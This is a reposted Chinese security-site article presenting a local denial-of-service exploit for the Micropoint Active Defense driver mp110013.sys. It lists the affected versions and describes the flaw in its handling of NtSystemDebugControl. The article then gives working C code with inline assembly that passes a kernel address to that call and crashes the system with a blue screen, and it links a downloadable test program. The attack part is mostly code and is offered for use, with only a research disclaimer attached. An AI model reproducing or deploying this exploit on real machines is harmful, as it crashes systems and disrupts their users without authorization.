【Exp】微点主动防御本地拒绝服务漏洞

admin
admin
admin
139024
文章
114
评论
2021年4月3日19:10:48评论34 views字数 928阅读3分5秒阅读模式

微点主动防御本地拒绝服务漏洞

微点主动防御mp110013.sys

产品版本:微点主动防御:mp.100323.1.2.10581.0278.r1
文件版本:mp110013.sys 1.3.10123.0 timestamp:4BA1863F checksum 1e7b8
漏洞详情:没有正确处理NtSystemDebugControl WriteVirtual/WritePhysical中的Address/Buffer成员,引发拒绝服务漏洞
测试程序:http://mj0011.ys168.com 漏洞演示目录下 mpbsod_fun_2.rar,运行后系统即崩溃

typedef struct _SYSDBG_VIRTUAL {
    PVOID Address;
    PVOID Buffer;
    ULONG Request;
} SYSDBG_VIRTUAL, *PSYSDBG_VIRTUAL;
int main(int argc, char* argv[])
{

printf("Micropoint Local D.O.S Vulnerabilityn"
   "BSOD Micropoint for fun!n"
   "By MJ0011nth_decoder$126.comnnPress Enter...n");
getchar();

SYSDBG_VIRTUAL sbv ;
sbv.Address = (PVOID)0x80000000;

PVOID pAddr = GetProcAddress(GetModuleHandle("ntdll.dll") , "NtSystemDebugControl");

__asm
{
   push 0
   push 0
   push 0
   lea eax , sbv
   push eax
   push 0xb
   call pAddr
}
return 0;
}

文章来源于lcx.cc:【Exp】微点主动防御本地拒绝服务漏洞

相关推荐: 正则表达式分组在Firefox中的有趣現象

原文:http://homakov.blogspot.hk/2013/12/regexp-groups-overflow-in-ff.html 分组(子表达式)在Firefox中只要匹配到999 998個以上就會產生一種類似「溢出」的現象,不論匹配與否皆返回f…

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月3日19:10:48
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【Exp】微点主动防御本地拒绝服务漏洞https://cn-sec.com/archives/320108.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息